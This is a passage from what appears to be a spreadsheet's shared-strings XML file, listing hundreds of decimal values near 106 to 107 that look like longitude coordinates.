    <t>107.16427</t>
  </si>
  <si>
    <t>106.91296</t>
  </si>
  <si>
    <t>110.71223</t>
  </si>
  <si>
    <t>106.99270</t>
  </si>
  <si>
    <t>106.95228</t>
  </si>
  <si>
    <t>110.72170</t>
  </si>
  <si>
    <t>107.25448</t>
  </si>
  <si>
    <t>110.71910</t>
  </si>
  <si>
    <t>107.18116</t>
  </si>
  <si>
    <t>106.57732</t>
  </si>
  <si>
    <t>106.57724</t>
  </si>
  <si>
    <t>106.59440</t>
  </si>
  <si>
    <t>106.69325</t>
  </si>
  <si>
    <t>106.85769</t>
  </si>
  <si>
    <t>106.88049</t>
  </si>
  <si>
    <t>106.85911</t>
  </si>
  <si>
    <t>106.95780</t>
  </si>
  <si>
    <t>106.87607</t>
  </si>
  <si>
    <t>106.94537</t>
  </si>
  <si>
    <t>106.75867</t>
  </si>
  <si>
    <t>106.93654</t>
  </si>
  <si>
    <t>106.89757</t>
  </si>
  <si>
    <t>106.85157</t>
  </si>
  <si>
    <t>106.70207</t>
  </si>
  <si>
    <t>106.89353</t>
  </si>
  <si>
    <t>106.69340</t>
  </si>
  <si>
    <t>106.88885</t>
  </si>
  <si>
    <t>106.71003</t>
  </si>
  <si>
    <t>106.70417</t>
  </si>
  <si>
    <t>106.95518</t>
  </si>
  <si>
    <t>106.67136</t>
  </si>
  <si>
    <t>106.91498</t>
  </si>
  <si>
    <t>107.02059</t>
  </si>
  <si>
    <t>106.90306</t>
  </si>
  <si>
    <t>106.89920</t>
  </si>
  <si>
    <t>106.94800</t>
  </si>
  <si>
    <t>106.92238</t>
  </si>
  <si>
    <t>106.70907</t>
  </si>
  <si>
    <t>106.94798</t>
  </si>
  <si>
    <t>106.92591</t>
  </si>
  <si>
    <t>106.92896</t>
  </si>
  <si>
    <t>106.90034</t>
  </si>
  <si>
    <t>106.95777</t>
  </si>
  <si>
    <t>106.81273</t>
  </si>
  <si>
    <t>106.95361</t>
  </si>
  <si>
    <t>106.89999</t>
  </si>
  <si>
    <t>107.01608</t>
  </si>
  <si>
    <t>107.06289</t>
  </si>
  <si>
    <t>106.97045</t>
  </si>
  <si>
    <t>106.93696</t>
  </si>
  <si>
    <t>106.91132</t>
  </si>
  <si>
    <t>106.92481</t>
  </si>
  <si>
    <t>106.70388</t>
  </si>
  <si>
    <t>106.91204</t>
  </si>
  <si>
    <t>106.92559</t>
  </si>
  <si>
    <t>106.89650</t>
  </si>
  <si>
    <t>107.01991</t>
  </si>
  <si>
    <t>106.75969</t>
  </si>
  <si>
    <t>106.93782</t>
  </si>
  <si>
    <t>106.91623</t>
  </si>
  <si>
    <t>106.94332</t>
  </si>
  <si>
    <t>106.87450</t>
  </si>
  <si>
    <t>106.90708</t>
  </si>
  <si>
    <t>106.90642</t>
  </si>
  <si>
    <t>106.90167</t>
  </si>
  <si>
    <t>106.90224</t>
  </si>
  <si>
    <t>106.90443</t>
  </si>
  <si>
    <t>107.01973</t>
  </si>
  <si>
    <t>107.01094</t>
  </si>
  <si>
    <t>106.94151</t>
  </si>
  <si>
    <t>106.90354</t>
  </si>
  <si>
    <t>107.16428</t>
  </si>
  <si>
    <t>107.03016</t>
  </si>
  <si>
    <t>106.91018</t>
  </si>
  <si>
    <t>106.88048</t>
  </si>
  <si>
    <t>106.95912</t>
  </si>
  <si>
    <t>107.01885</t>
  </si>
  <si>
    <t>106.87455</t>
  </si>
  <si>
    <t>107.03956</t>
  </si>
  <si>
    <t>106.87654</t>
  </si>
  <si>
    <t>106.70262</t>
  </si>
  <si>
    <t>106.93491</t>
  </si>
  <si>
    <t>106.94016</t>
  </si>
  <si>
    <t>106.89374</t>
  </si>
  <si>
    <t>106.70764</t>
  </si>
  <si>
    <t>106.91572</t>
  </si>
  <si>
    <t>106.70898</t>
  </si>
  <si>
    <t>106.86513</t>
  </si>
  <si>
    <t>107.01949</t>
  </si>
  <si>
    <t>106.90454</t>
  </si>
  <si>
    <t>106.85580</t>
  </si>
  <si>
    <t>106.90286</t>
  </si>
  <si>
    <t>106.93851</t>
  </si>
  <si>
    <t>106.98475</t>
  </si>
  <si>
    <t>106.85138</t>
  </si>
  <si>
    <t>106.96553</t>
  </si>
  <si>
    <t>106.85192</t>
  </si>
  <si>
    <t>106.86434</t>
  </si>
  <si>
    <t>106.93841</t>
  </si>
  <si>
    <t>106.88056</t>
  </si>
  <si>
    <t>106.87468</t>
  </si>
  <si>
    <t>106.84286</t>
  </si>
  <si>
    <t>106.89058</t>
  </si>
  <si>
    <t>106.87945</t>
  </si>
  <si>
    <t>106.85786</t>
  </si>
  <si>
    <t>106.88716</t>
  </si>
  <si>
    <t>106.81802</t>
  </si>
  <si>
    <t>106.88029</t>
  </si>
  <si>
    <t>106.88567</t>
  </si>
  <si>
    <t>107.04932</t>
  </si>
  <si>
    <t>106.78197</t>
  </si>
  <si>
    <t>106.88247</t>
  </si>
  <si>
    <t>106.85648</t>
  </si>
  <si>
    <t>106.84555</t>
  </si>
  <si>
    <t>106.78833</t>
  </si>
  <si>
    <t>106.85279</t>
  </si>
  <si>
    <t>106.96993</t>
  </si>
  <si>
    <t>106.87865</t>
  </si>
  <si>
    <t>106.85226</t>
  </si>
  <si>
    <t>106.86706</t>
  </si>
  <si>
    <t>106.92252</t>
  </si>
  <si>
    <t>106.75662</t>
  </si>
  <si>
    <t>106.81920</t>
  </si>
  <si>
    <t>106.77472</t>
  </si>
  <si>
    <t>106.85966</t>
  </si>
  <si>
    <t>106.92208</t>
  </si>
  <si>
    <t>106.87065</t>
  </si>
  <si>
    <t>106.90652</t>
  </si>
  <si>
    <t>106.93789</t>
  </si>
  <si>
    <t>106.89601</t>
  </si>
  <si>
    <t>106.85463</t>
  </si>
  <si>
    <t>106.93180</t>
  </si>
  <si>
    <t>106.90002</t>
  </si>
  <si>
    <t>106.88146</t>
  </si>
  <si>
    <t>106.96646</t>
  </si>
  <si>
    <t>106.84329</t>
  </si>
  <si>
    <t>106.95439</t>
  </si>
  <si>
    <t>106.82859</t>
  </si>
  <si>
    <t>106.91325</t>
  </si>
  <si>
    <t>106.89104</t>
  </si>
  <si>
    <t>106.88423</t>
  </si>
  <si>
    <t>106.74087</t>
  </si>
  <si>
    <t>106.87002</t>
  </si>
  <si>
    <t>106.98019</t>
  </si>
  <si>
    <t>107.03519</t>
  </si>
  <si>
    <t>106.75314</t>
  </si>
  <si>
    <t>106.83996</t>
  </si>
  <si>
    <t>107.59666</t>
  </si>
  <si>
    <t>106.99950</t>
  </si>
  <si>
    <t>106.69474</t>
  </si>
  <si>
    <t>106.82073</t>
  </si>
  <si>
    <t>106.98461</t>
  </si>
  <si>
    <t>106.89090</t>
  </si>
  <si>
    <t>106.87101</t>
  </si>
  <si>
    <t>106.87227</t>
  </si>
  <si>
    <t>106.82463</t>
  </si>
  <si>
    <t>106.89195</t>
  </si>
  <si>
    <t>106.86073</t>
  </si>
  <si>
    <t>106.88117</t>
  </si>
  <si>
    <t>106.90985</t>
  </si>
  <si>
    <t>107.02347</t>
  </si>
  <si>
    <t>107.01354</t>
  </si>
  <si>
    <t>106.82284</t>
  </si>
  <si>
    <t>106.84414</t>
  </si>
  <si>
    <t>106.87267</t>
  </si>
  <si>
    <t>106.87417</t>
  </si>
  <si>
    <t>106.82455</t>
  </si>
  <si>
    <t>107.02209</t>
  </si>
  <si>
    <t>106.82367</t>
  </si>
  <si>
    <t>106.96071</t>
  </si>
  <si>
    <t>106.83517</t>
  </si>
  <si>
    <t>106.92139</t>
  </si>
  <si>
    <t>106.86696</t>
  </si>
  <si>
    <t>106.86089</t>
  </si>
  <si>
    <t>106.82000</t>
  </si>
  <si>
    <t>106.91848</t>
  </si>
  <si>
    <t>106.91109</t>
  </si>
  <si>
    <t>106.85307</t>
  </si>
  <si>
    <t>106.83074</t>
  </si>
  <si>
    <t>106.84262</t>
  </si>
  <si>
    <t>106.82189</t>
  </si>
  <si>
    <t>106.69184</t>
  </si>
  <si>
    <t>106.82074</t>
  </si>
  <si>
    <t>106.88227</t>
  </si>
  <si>
    <t>106.74057</t>
  </si>
  <si>
    <t>106.82477</t>
  </si>
  <si>
    <t>106.84121</t>
  </si>
  <si>
    <t>106.90022</t>
  </si>
  <si>
    <t>106.88230</t>
  </si>
  <si>
    <t>106.94701</t>
  </si>
  <si>
    <t>107.03666</t>
  </si>
  <si>
    <t>106.86627</t>
  </si>
  <si>
    <t>106.96656</t>
  </si>
  <si>
    <t>107.01759</t>
  </si>
  <si>
    <t>106.82942</t>
  </si>
  <si>
    <t>106.87461</t>
  </si>
  <si>
    <t>106.81586</t>
  </si>
  <si>
    <t>106.83591</t>
  </si>
  <si>
    <t>106.94526</t>
  </si>
  <si>
    <t>106.91239</t>
  </si>
  <si>
    <t>106.80177</t>
  </si>
  <si>
    <t>106.90309</t>
  </si>
  <si>
    <t>106.93685</t>
  </si>
  <si>
    <t>106.87824</t>
  </si>
  <si>
    <t>106.98986</t>
  </si>
  <si>
    <t>106.85528</t>
  </si>
  <si>
    <t>106.90601</t>
  </si>
  <si>
    <t>106.85354</t>
  </si>
  <si>
    <t>106.98259</t>
  </si>
  <si>
    <t>106.94965</t>
  </si>
  <si>
    <t>106.80057</t>
  </si>
  <si>
    <t>107.02727</t>
  </si>
  <si>
    <t>106.97084</t>
  </si>
  <si>
    <t>106.94980</t>
  </si>
  <si>
    <t>106.89093</t>
  </si>
  <si>
    <t>106.91095</t>
  </si>
  <si>
    <t>106.68913</t>
  </si>
  <si>
    <t>106.91471</t>
  </si>
  <si>
    <t>106.95079</t>
  </si>
  <si>
    <t>106.72159</t>
  </si>
  <si>
    <t>106.88383</t>
  </si>
  <si>
    <t>106.97854</t>
  </si>
  <si>
    <t>106.91330</t>
  </si>
  <si>
    <t>106.85899</t>
  </si>
  <si>
    <t>106.75898</t>
  </si>
  <si>
    <t>106.79016</t>
  </si>
  <si>
    <t>106.85475</t>
  </si>
  <si>
    <t>106.83796</t>
  </si>
  <si>
    <t>106.81222</t>
  </si>
  <si>
    <t>106.90033</t>
  </si>
  <si>
    <t>106.90258</t>
  </si>
  <si>
    <t>106.88147</t>
  </si>
  <si>
    <t>106.88200</t>
  </si>
  <si>
    <t>106.86191</t>
  </si>
  <si>
    <t>106.97307</t>
  </si>
  <si>
    <t>106.88417</t>
  </si>
  <si>
    <t>106.81065</t>
  </si>
  <si>
    <t>106.84548</t>
  </si>
  <si>
    <t>106.77101</t>
  </si>
  <si>
    <t>106.97178</t>
  </si>
  <si>
    <t>107.03960</t>
  </si>
  <si>
    <t>106.82537</t>
  </si>
  <si>
    <t>106.85677</t>
  </si>
  <si>
    <t>106.72970</t>
  </si>
  <si>
    <t>106.81101</t>
  </si>
  <si>
    <t>106.85117</t>
  </si>
  <si>
    <t>106.69245</t>
  </si>
  <si>
    <t>107.01986</t>
  </si>
  <si>
    <t>106.95014</t>
  </si>
  <si>
    <t>106.76076</t>
  </si>
  <si>
    <t>106.96797</t>
  </si>
  <si>
    <t>107.60302</t>
  </si>
  <si>
    <t>106.76337</t>
  </si>
  <si>
    <t>106.90836</t>
  </si>
  <si>
    <t>106.76077</t>
  </si>
  <si>
    <t>106.78853</t>
  </si>
  <si>
    <t>106.87716</t>
  </si>
  <si>
    <t>106.92735</t>
  </si>
  <si>
    <t>106.90924</t>
  </si>
  <si>
    <t>106.93678</t>
  </si>
  <si>
    <t>106.98426</t>
  </si>
  <si>
    <t>106.88218</t>
  </si>
  <si>
    <t>106.93752</t>
  </si>
  <si>
    <t>106.86998</t>
  </si>
  <si>
    <t>106.81897</t>
  </si>
  <si>
    <t>106.99484</t>
  </si>
  <si>
    <t>106.69672</t>
  </si>
  <si>
    <t>106.86713</t>
  </si>
  <si>
    <t>106.84458</t>
  </si>
  <si>
    <t>106.85425</t>
  </si>
  <si>
    <t>106.90419</t>
  </si>
  <si>
    <t>106.92906</t>
  </si>
  <si>
    <t>106.92212</t>
  </si>
  <si>
    <t>106.96883</t>
  </si>
  <si>
    <t>106.85866</t>
  </si>
  <si>
    <t>106.87436</t>
  </si>
  <si>
    <t>106.71208</t>
  </si>
  <si>
    <t>106.91108</t>
  </si>
  <si>
    <t>106.96336</t>
  </si>
  <si>
    <t>106.98732</t>
  </si>
  <si>
    <t>106.87277</t>
  </si>
  <si>
    <t>107.02791</t>
  </si>
  <si>
    <t>106.82115</t>
  </si>
  <si>
    <t>106.90616</t>
  </si>
  <si>
    <t>106.74707</t>
  </si>
  <si>
    <t>106.91765</t>
  </si>
  <si>
    <t>106.84056</t>
  </si>
  <si>
    <t>106.93819</t>
  </si>
  <si>
    <t>106.80305</t>
  </si>
  <si>
    <t>107.03640</t>
  </si>
  <si>
    <t>106.85225</t>
  </si>
  <si>
    <t>106.82590</t>
  </si>
  <si>
    <t>106.87072</t>
  </si>
  <si>
    <t>106.81078</t>
  </si>
  <si>
    <t>106.80110</t>
  </si>
  <si>
    <t>106.82764</t>
  </si>
  <si>
    <t>106.90248</t>
  </si>
  <si>
    <t>106.82436</t>
  </si>
  <si>
    <t>106.92281</t>
  </si>
  <si>
    <t>106.85244</t>
  </si>
  <si>
    <t>106.77436</t>
  </si>
  <si>
    <t>106.90066</t>
  </si>
  <si>
    <t>106.81218</t>
  </si>
  <si>
    <t>106.93049</t>
  </si>
  <si>
    <t>106.84439</t>
  </si>
  <si>
    <t>106.97007</t>
  </si>
  <si>
    <t>106.93110</t>
  </si>
  <si>
    <t>106.97226</t>
  </si>
  <si>
    <t>106.80371</t>
  </si>
  <si>
    <t>106.99299</t>
  </si>
  <si>
    <t>106.92450</t>
  </si>
  <si>
    <t>107.04167</t>
  </si>
  <si>
    <t>106.89682</t>
  </si>
  <si>
    <t>106.98812</t>
  </si>
  <si>
    <t>106.97293</t>
  </si>
  <si>
    <t>106.86178</t>
  </si>
  <si>
    <t>106.84069</t>
  </si>
  <si>
    <t>106.76612</t>
  </si>
  <si>
    <t>106.97409</t>
  </si>
  <si>
    <t>106.82445</t>
  </si>
  <si>
    <t>106.81010</t>
  </si>
  <si>
    <t>106.94859</t>
  </si>
  <si>
    <t>106.80888</t>
  </si>
  <si>
    <t>106.93118</t>
  </si>
  <si>
    <t>106.97097</t>
  </si>
  <si>
    <t>106.93044</t>
  </si>
  <si>
    <t>106.94057</t>
  </si>
  <si>
    <t>106.98831</t>
  </si>
  <si>
    <t>107.00795</t>
  </si>
  <si>
    <t>106.81008</t>
  </si>
  <si>
    <t>106.89427</t>
  </si>
  <si>
    <t>106.82274</t>
  </si>
  <si>
    <t>106.97215</t>
  </si>
  <si>
    <t>106.70092</t>
  </si>
  <si>
    <t>106.94592</t>
  </si>
  <si>
    <t>106.78990</t>
  </si>
  <si>
    <t>107.01254</t>
  </si>
  <si>
    <t>106.95916</t>
  </si>
  <si>
    <t>106.87206</t>
  </si>
  <si>
    <t>106.87674</t>
  </si>
  <si>
    <t>106.72540</t>
  </si>
  <si>
    <t>106.84466</t>
  </si>
  <si>
    <t>106.78814</t>
  </si>
  <si>
    <t>106.81160</t>
  </si>
  <si>
    <t>107.02128</t>
  </si>
  <si>
    <t>106.87753</t>
  </si>
  <si>
    <t>106.84880</t>
  </si>
  <si>
    <t>106.79474</t>
  </si>
  <si>
    <t>107.02652</t>
  </si>
  <si>
    <t>106.96087</t>
  </si>
  <si>
    <t>106.96298</t>
  </si>
  <si>
    <t>106.78031</t>
  </si>
  <si>
    <t>106.81515</t>
  </si>
  <si>
    <t>106.80730</t>
  </si>
  <si>
    <t>106.90120</t>
  </si>
  <si>
    <t>106.82340</t>
  </si>
  <si>
    <t>106.91013</t>
  </si>
  <si>
    <t>106.96098</t>
  </si>
  <si>
    <t>106.73894</t>
  </si>
  <si>
    <t>106.78234</t>
  </si>
  <si>
    <t>106.74600</t>
  </si>
  <si>
    <t>107.02496</t>
  </si>
  <si>
    <t>106.75613</t>
  </si>
  <si>
    <t>106.75853</t>
  </si>
  <si>
    <t>106.92667</t>
  </si>
  <si>
    <t>106.76896</t>
  </si>
  <si>
    <t>106.85640</t>
  </si>
  <si>
    <t>106.99183</t>
  </si>
  <si>
    <t>106.81776</t>
  </si>
  <si>
    <t>106.72127</t>
  </si>
  <si>
    <t>106.89841</t>
  </si>
  <si>
    <t>107.09549</t>
  </si>
  <si>
    <t>106.72474</t>
  </si>
  <si>
    <t>106.76869</t>
  </si>
  <si>
    <t>106.80440</t>
  </si>
  <si>
    <t>107.82044</t>
  </si>
  <si>
    <t>106.83757</t>
  </si>
  <si>
    <t>106.68956</t>
  </si>
  <si>
    <t>106.82229</t>
  </si>
  <si>
    <t>106.88894</t>
  </si>
  <si>
    <t>107.06039</t>
  </si>
  <si>
    <t>106.79207</t>
  </si>
  <si>
    <t>106.96398</t>
  </si>
  <si>
    <t>106.99439</t>
  </si>
  <si>
    <t>106.85620</t>
  </si>
  <si>
    <t>106.86466</t>
  </si>
  <si>
    <t>106.87214</t>
  </si>
  <si>
    <t>106.99474</t>
  </si>
  <si>
    <t>106.90650</t>
  </si>
  <si>
    <t>106.79867</t>
  </si>
  <si>
    <t>106.88881</t>
  </si>
  <si>
    <t>107.01056</t>
  </si>
  <si>
    <t>106.79638</t>
  </si>
  <si>
    <t>106.73846</t>
  </si>
  <si>
    <t>107.00445</t>
  </si>
  <si>
    <t>106.90577</t>
  </si>
  <si>
    <t>106.90305</t>
  </si>
  <si>
    <t>106.97530</t>
  </si>
  <si>
    <t>106.82503</t>
  </si>
  <si>
    <t>106.86385</t>
  </si>
  <si>
    <t>106.95929</t>
  </si>
  <si>
    <t>106.79069</t>
  </si>
  <si>
    <t>106.92126</t>
  </si>
  <si>
    <t>106.95033</t>
  </si>
  <si>
    <t>106.81440</t>
  </si>
  <si>
    <t>106.90428</t>
  </si>
  <si>
    <t>106.97063</t>
  </si>
  <si>
    <t>106.81755</t>
  </si>
  <si>
    <t>106.80976</t>
  </si>
  <si>
    <t>106.93348</t>
  </si>
  <si>
    <t>106.88158</t>
  </si>
  <si>
    <t>106.81439</t>
  </si>
  <si>
    <t>107.01395</t>
  </si>
  <si>
    <t>106.86829</t>
  </si>
  <si>
    <t>106.95456</t>
  </si>
  <si>
    <t>106.84595</t>
  </si>
  <si>
    <t>106.97386</t>
  </si>
  <si>
    <t>106.84132</t>
  </si>
  <si>
    <t>106.87190</t>
  </si>
  <si>
    <t>106.82357</t>
  </si>
  <si>
    <t>106.89076</t>
  </si>
  <si>
    <t>106.86334</t>
  </si>
  <si>
    <t>106.83123</t>
  </si>
  <si>
    <t>106.83838</t>
  </si>
  <si>
    <t>106.74033</t>
  </si>
  <si>
    <t>106.86881</t>
  </si>
  <si>
    <t>106.86646</t>
  </si>
  <si>
    <t>106.93277</t>
  </si>
  <si>
    <t>106.87981</t>
  </si>
  <si>
    <t>106.83031</t>
  </si>
  <si>
    <t>106.90314</t>
  </si>
  <si>
    <t>107.04756</t>
  </si>
  <si>
    <t>106.91427</t>
  </si>
  <si>
    <t>106.77453</t>
  </si>
  <si>
    <t>106.82783</t>
  </si>
  <si>
    <t>106.83736</t>
  </si>
  <si>
    <t>106.85637</t>
  </si>
  <si>
    <t>106.59035</t>
  </si>
  <si>
    <t>106.82789</t>
  </si>
  <si>
    <t>106.94858</t>
  </si>
  <si>
    <t>106.93818</t>
  </si>
  <si>
    <t>106.82083</t>
  </si>
  <si>
    <t>106.87702</t>
  </si>
  <si>
    <t>106.78070</t>
  </si>
  <si>
    <t>106.77795</t>
  </si>
  <si>
    <t>106.88574</t>
  </si>
  <si>
    <t>106.78783</t>
  </si>
  <si>
    <t>106.99159</t>
  </si>
  <si>
    <t>106.96455</t>
  </si>
  <si>
    <t>107.04733</t>
  </si>
  <si>
    <t>106.80785</t>
  </si>
  <si>
    <t>106.72657</t>
  </si>
  <si>
    <t>106.99825</t>
  </si>
  <si>
    <t>106.83529</t>
  </si>
  <si>
    <t>106.83822</t>
  </si>
  <si>
    <t>106.90399</t>
  </si>
  <si>
    <t>106.97144</t>
  </si>
  <si>
    <t>106.90318</t>
  </si>
  <si>
    <t>106.73635</t>
  </si>
  <si>
    <t>107.16624</t>
  </si>
  <si>
    <t>106.95428</t>
  </si>
  <si>
    <t>106.82844</t>
  </si>
  <si>
    <t>106.91316</t>
  </si>
  <si>
    <t>106.94612</t>
  </si>
  <si>
    <t>107.01069</t>
  </si>
  <si>
    <t>107.02681</t>
  </si>
  <si>
    <t>107.09521</t>
  </si>
  <si>
    <t>106.82276</t>
  </si>
  <si>
    <t>106.71724</t>
  </si>
  <si>
    <t>106.97027</t>
  </si>
  <si>
    <t>106.86374</t>
  </si>
  <si>
    <t>106.94772</t>
  </si>
  <si>
    <t>106.58720</t>
  </si>
  <si>
    <t>106.86281</t>
  </si>
  <si>
    <t>106.97888</t>
  </si>
  <si>
    <t>106.71809</t>
  </si>
  <si>
    <t>106.87573</t>
  </si>
  <si>
    <t>106.60180</t>
  </si>
  <si>
    <t>107.09433</t>
  </si>
  <si>
    <t>106.81482</t>
  </si>
  <si>
    <t>106.99492</t>
  </si>
  <si>
    <t>106.96630</t>
  </si>
  <si>
    <t>106.77327</t>
  </si>
  <si>
    <t>106.85137</t>
  </si>
  <si>
    <t>106.76419</t>
  </si>
  <si>
    <t>106.85401</t>
  </si>
  <si>
    <t>106.95170</t>
  </si>
  <si>
    <t>106.94941</t>
  </si>
  <si>
    <t>106.74407</t>
  </si>
  <si>
    <t>106.85894</t>
  </si>
  <si>
    <t>106.86708</t>
  </si>
  <si>
    <t>107.05871</t>
  </si>
  <si>
    <t>106.82920</t>
  </si>
  <si>
    <t>106.87642</t>
  </si>
  <si>
    <t>106.78461</t>
  </si>
  <si>
    <t>106.78434</t>
  </si>
  <si>
    <t>107.09377</t>
  </si>
  <si>
    <t>106.81224</t>
  </si>
  <si>
    <t>106.89277</t>
  </si>
  <si>
    <t>106.90968</t>
  </si>
  <si>
    <t>106.84418</t>
  </si>
  <si>
    <t>106.82254</t>
  </si>
  <si>
    <t>106.90056</t>
  </si>
  <si>
    <t>106.90276</t>
  </si>
  <si>
    <t>106.81562</t>
  </si>
  <si>
    <t>106.70084</t>
  </si>
  <si>
    <t>106.81066</t>
  </si>
  <si>
    <t>106.96038</t>
  </si>
  <si>
    <t>106.88090</t>
  </si>
  <si>
    <t>107.08719</t>
  </si>
  <si>
    <t>106.86754</t>
  </si>
  <si>
    <t>106.99312</t>
  </si>
  <si>
    <t>106.98897</t>
  </si>
  <si>
    <t>106.89311</t>
  </si>
  <si>
    <t>106.83774</t>
  </si>
  <si>
    <t>106.94721</t>
  </si>
  <si>
    <t>106.92086</t>
  </si>
  <si>
    <t>106.76828</t>
  </si>
  <si>
    <t>106.90506</t>
  </si>
  <si>
    <t>106.94173</t>
  </si>
  <si>
    <t>106.77459</t>
  </si>
  <si>
    <t>106.94442</t>
  </si>
  <si>
    <t>106.90404</t>
  </si>
  <si>
    <t>106.70754</t>
  </si>
  <si>
    <t>106.78674</t>
  </si>
  <si>
    <t>106.90668</t>
  </si>
  <si>
    <t>107.03363</t>
  </si>
  <si>
    <t>106.94453</t>
  </si>
  <si>
    <t>106.91441</t>
  </si>
  <si>
    <t>106.92891</t>
  </si>
  <si>
    <t>106.84677</t>
  </si>
  <si>
    <t>106.90844</t>
  </si>
  <si>
    <t>106.94154</t>
  </si>
  <si>
    <t>106.87903</t>
  </si>
  <si>
    <t>106.87041</t>
  </si>
  <si>
    <t>106.77364</t>
  </si>
  <si>
    <t>106.86199</t>
  </si>
  <si>
    <t>106.71812</t>
  </si>
  <si>
    <t>106.96858</t>
  </si>
  <si>
    <t>106.91501</t>
  </si>
  <si>
    <t>106.72070</t>
  </si>
  <si>
    <t>106.86353</t>
  </si>
  <si>
    <t>106.92373</t>
  </si>
  <si>
    <t>106.96356</t>
  </si>
  <si>
    <t>107.02342</t>
  </si>
  <si>
    <t>106.85701</t>
  </si>
  <si>
    <t>107.04313</t>
  </si>
  <si>
    <t>106.84318</t>
  </si>
  <si>
    <t>106.85215</t>
  </si>
  <si>
    <t>106.75065</t>
  </si>
  <si>
    <t>106.97145</t>
  </si>
  <si>
    <t>106.86763</t>
  </si>
  <si>
    <t>106.83310</t>
  </si>
  <si>
    <t>106.97774</t>
  </si>
  <si>
    <t>106.84562</t>
  </si>
  <si>
    <t>106.91589</t>
  </si>
  <si>
    <t>106.83396</t>
  </si>
  <si>
    <t>106.78959</t>
  </si>
  <si>
    <t>106.83224</t>
  </si>
  <si>
    <t>106.77696</t>
  </si>
  <si>
    <t>106.81321</t>
  </si>
  <si>
    <t>106.80572</t>
  </si>
  <si>
    <t>106.91035</t>
  </si>
  <si>
    <t>106.80844</t>
  </si>
  <si>
    <t>106.91490</t>
  </si>
  <si>
    <t>106.82593</t>
  </si>
  <si>
    <t>106.91567</t>
  </si>
  <si>
    <t>106.77318</t>
  </si>
  <si>
    <t>106.91619</t>
  </si>
  <si>
    <t>106.81415</t>
  </si>
  <si>
    <t>106.89474</t>
  </si>
  <si>
    <t>106.76328</t>
  </si>
  <si>
    <t>106.83442</t>
  </si>
  <si>
    <t>107.04504</t>
  </si>
  <si>
    <t>106.52323</t>
  </si>
  <si>
    <t>106.84386</t>
  </si>
  <si>
    <t>106.91242</t>
  </si>
  <si>
    <t>106.78489</t>
  </si>
  <si>
    <t>106.89673</t>
  </si>
  <si>
    <t>107.05069</t>
  </si>
  <si>
    <t>106.83348</t>
  </si>
  <si>
    <t>106.59575</t>
  </si>
  <si>
    <t>106.93839</t>
  </si>
  <si>
    <t>106.76297</t>
  </si>
  <si>
    <t>106.82696</t>
  </si>
  <si>
    <t>106.80882</t>
  </si>
  <si>
    <t>106.74619</t>
  </si>
  <si>
    <t>106.81267</t>
  </si>
  <si>
    <t>106.81304</t>
  </si>
  <si>
    <t>106.81230</t>
  </si>
  <si>
    <t>106.81904</t>
  </si>
  <si>
    <t>106.82669</t>
  </si>
  <si>
    <t>107.01040</t>
  </si>
  <si>
    <t>106.92305</t>
  </si>
  <si>
    <t>106.90277</t>
  </si>
  <si>
    <t>106.90388</t>
  </si>
  <si>
    <t>106.98412</t>
  </si>
  <si>
    <t>106.78415</t>
  </si>
  <si>
    <t>106.69243</t>
  </si>
  <si>
    <t>106.90825</t>
  </si>
  <si>
    <t>106.97460</t>
  </si>
  <si>
    <t>106.78910</t>
  </si>
  <si>
    <t>106.94010</t>
  </si>
  <si>
    <t>107.04535</t>
  </si>
  <si>
    <t>106.81710</t>
  </si>
  <si>
    <t>106.93674</t>
  </si>
  <si>
    <t>106.84010</t>
  </si>
  <si>
    <t>106.69306</t>
  </si>
  <si>
    <t>106.77344</t>
  </si>
  <si>
    <t>106.89974</t>
  </si>
  <si>
    <t>106.93633</t>
  </si>
  <si>
    <t>106.91861</t>
  </si>
  <si>
    <t>106.81882</t>
  </si>
  <si>
    <t>106.80271</t>
  </si>
  <si>
    <t>106.92119</t>
  </si>
  <si>
    <t>106.78418</t>
  </si>
  <si>
    <t>106.76033</t>
  </si>
  <si>
    <t>107.05572</t>
  </si>
  <si>
    <t>106.90472</t>
  </si>
  <si>
    <t>106.82835</t>
  </si>
  <si>
    <t>106.86799</t>
  </si>
  <si>
    <t>106.86563</t>
  </si>
  <si>
    <t>106.90274</t>
  </si>
  <si>
    <t>106.93516</t>
  </si>
  <si>
    <t>106.87528</t>
  </si>
  <si>
    <t>99.05101</t>
  </si>
  <si>
    <t>106.77955</t>
  </si>
  <si>
    <t>106.88237</t>
  </si>
  <si>
    <t>106.88217</t>
  </si>
  <si>
    <t>106.86364</t>
  </si>
  <si>
    <t>106.88971</t>
  </si>
  <si>
    <t>106.82122</t>
  </si>
  <si>
    <t>106.83221</t>
  </si>
  <si>
    <t>106.76867</t>
  </si>
  <si>
    <t>106.82024</t>
  </si>
  <si>
    <t>106.95280</t>
  </si>
  <si>
    <t>106.87200</t>
  </si>
  <si>
    <t>106.82103</t>
  </si>
  <si>
    <t>106.77885</t>
  </si>
  <si>
    <t>106.97959</t>
  </si>
  <si>
    <t>107.02084</t>
  </si>
  <si>
    <t>106.90914</t>
  </si>
  <si>
    <t>106.84719</t>
  </si>
  <si>
    <t>106.80806</t>
  </si>
  <si>
    <t>106.74017</t>
  </si>
  <si>
    <t>106.89018</t>
  </si>
  <si>
    <t>106.77369</t>
  </si>
  <si>
    <t>106.81794</t>
  </si>
  <si>
    <t>106.89320</t>
  </si>
  <si>
    <t>107.05464</t>
  </si>
  <si>
    <t>106.97184</t>
  </si>
  <si>
    <t>106.71215</t>
  </si>
  <si>
    <t>106.69794</t>
  </si>
  <si>
    <t>106.74659</t>
  </si>
  <si>
    <t>106.81068</t>
  </si>
  <si>
    <t>107.06067</t>
  </si>
  <si>
    <t>107.08763</t>
  </si>
  <si>
    <t>106.87064</t>
  </si>
  <si>
    <t>107.03484</t>
  </si>
  <si>
    <t>106.81399</t>
  </si>
  <si>
    <t>106.91342</t>
  </si>
  <si>
    <t>106.77893</t>
  </si>
  <si>
    <t>106.91458</t>
  </si>
  <si>
    <t>106.71982</t>
  </si>
  <si>
    <t>107.07185</t>
  </si>
  <si>
    <t>106.96427</t>
  </si>
  <si>
    <t>107.02764</t>
  </si>
  <si>
    <t>106.91802</t>
  </si>
  <si>
    <t>106.91792</t>
  </si>
  <si>
    <t>106.85039</t>
  </si>
  <si>
    <t>106.85538</t>
  </si>
  <si>
    <t>106.77268</t>
  </si>
  <si>
    <t>106.81707</t>
  </si>
  <si>
    <t>106.77152</t>
  </si>
  <si>
    <t>107.01390</t>
  </si>
  <si>
    <t>106.89671</t>
  </si>
  <si>
    <t>106.59865</t>
  </si>
  <si>
    <t>106.77423</t>
  </si>
  <si>
    <t>106.74003</t>
  </si>
  <si>
    <t>106.92094</t>
  </si>
  <si>
    <t>106.93887</t>
  </si>
  <si>
    <t>106.91202</t>
  </si>
